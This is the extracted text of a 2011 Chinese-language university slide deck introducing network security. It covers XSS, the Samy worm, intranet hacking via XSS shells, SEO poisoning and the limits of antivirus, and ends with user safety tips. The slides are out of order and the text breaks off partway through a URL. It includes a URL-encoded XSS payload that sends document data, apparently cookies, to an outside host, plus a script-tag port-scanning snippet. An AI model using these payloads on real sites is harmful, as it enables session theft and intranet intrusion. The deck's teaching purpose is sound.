网路安全简介.ppt

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * Worms (spreading) 一種最經濟實惠的方法散布Worms Samy (2005) 透過MySace在20小時內感染超過1,000,000 使用者 所有的網站都有可能成為目標Yahoo, twitter, plurk … etc XSS - 22 * Intranet Hacking(part 1) 瀏覽器可能會被你瀏覽的網頁鎖控制 XSS - 23 * Intranet Hacking(part 2) 程序: 受害者瀏覽一個具有惡意程式碼的網頁啟動惡意JavaScript JavaScript透過Applet取得內部網路的資訊 利用瀏覽器(XSS Shell)對內部網路進行其他動作 XSS - 24 * Intranet Hacking(part 3) 蒐集資訊: IP Port scanning - script src=http://ip//script 內部資料 - 取得主機檔案 file:/// - 更過應用透過XSS Shells XSS - 25 * 預防 XSS attacks XSS - 26 * XSS 是一個簡單的問題 ? XSS - 27 你還認為 * 你會被 來實行DDoS 當成跳板 甚至他可能直接控制你的電腦!! * 你也許會想 不要相信別人貼的網址 那我用Google來搜尋 應該就不會有問題了吧? * 但是你沒想過 Google也是有缺陷在的!! SEO有好有壞 好的幫助小企業行銷 壞的讓上網的人進錯網站!! * SEO? Search Engine Optimization Google的PR靠他來的 搜尋排名靠PR來的 總之全部都是SEO 而且他能作弊!! * 排名重要嗎? 34% 的使用者會點選搜尋的第一個結果 17% 會點選第二個 當假網站SEO做得比真網站好的時候 … 你會選對嗎? * 注意!! 在點下別人給你的連結之前 先看看有沒有包含可疑的字串 搜尋結果後 先看看網址 多個幾步減少成為受害者的機率 !! * 很久很久以前 曾經有一篇新聞 對啊!! 我們還有防毒軟體 * 過沒幾天 就有 「殺很大」或「遙遙巨乳宣導資安照片」 木馬出現… * 時間點來說 感染階段 空窗期 清除復原階段 病毒碼更新 * 防毒軟體觸發 下載 首頁 下載 執行檔 執行檔被執行 偵測點 偵測點 偵測點 3個偵測點 但是現今的防毒效率還是不高 … * 因為 … 惡意檔案被一種或多種加殼程式(Packer Program)壓縮過 惡意程式使用隱匿技術(Rootkit Technique) 惡意程式使用DLL Injection的技術 目標式攻擊的惡意程式樣本收集不易 編過碼的惡意Script (如JavaScript, VBScript等) 病毒特徵碼太大(很多防毒軟體都有這個問題) * 加殼? * 總體來說 防毒軟體並不是我們的最後一道防線啊!! 身為使用者 您自己的決定權 才是最後一道防線 * 那要怎麼辦? 盡量不要點來路不明的網址 如果有牽扯到重要資訊 務必選擇有SSL加密的連線 SSL具有以下幾項優點 私密性 完整性 身份認證性 * 總結 好的網路使用習慣 時時刻刻保持警覺的心 就能大幅降低電腦受到傷害的機率 * 最後… FAQ Time * 其實還有一頁!! 參考資料 大砲開講 : R BlackHat : B Google : G H : H WorldIT : W * * * * * * * * * * 網路 安全簡介 資工2B 鄭楷穎 985002529 webmaster@ 開課日期 2011-03-27 * 「多媒體與網路應用」資訊推廣課程 中大電子計算機中心 網路是安全的? 黑暗中探索著 未知的世界 … 你相信你看到的都是 … * 真的? 漏洞潛伏著 一點點的程式缺陷 … 都可能造成無法挽回的錯誤 * 你點下的連結 可能 早就被人修改 網頁已經被更動 就這樣而已嗎? * 你相信? * 不知不覺中 餅乾已經被偷走了!! 曾幾何時 你相信的防毒軟體網站 也背叛了你 * XSS? Cross-site scripting 簡單來說就是 網頁的不嚴謹 McAfee Symantec VerSign NOD32 都曾經出現過缺陷 * 那是什? /query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%3Bimg.src%3D%22http%3A%2F%2F%2F%3F%22%2Bdocumen